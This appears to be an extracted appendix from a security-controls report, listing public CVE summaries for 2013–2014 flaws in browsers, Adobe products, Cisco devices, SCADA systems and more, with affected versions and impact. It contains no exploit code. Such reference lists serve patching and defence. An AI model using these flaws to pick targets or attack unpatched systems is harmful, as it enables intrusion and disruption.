CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster, Page 26 of 28

Survey Responses


CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50.488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.


CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

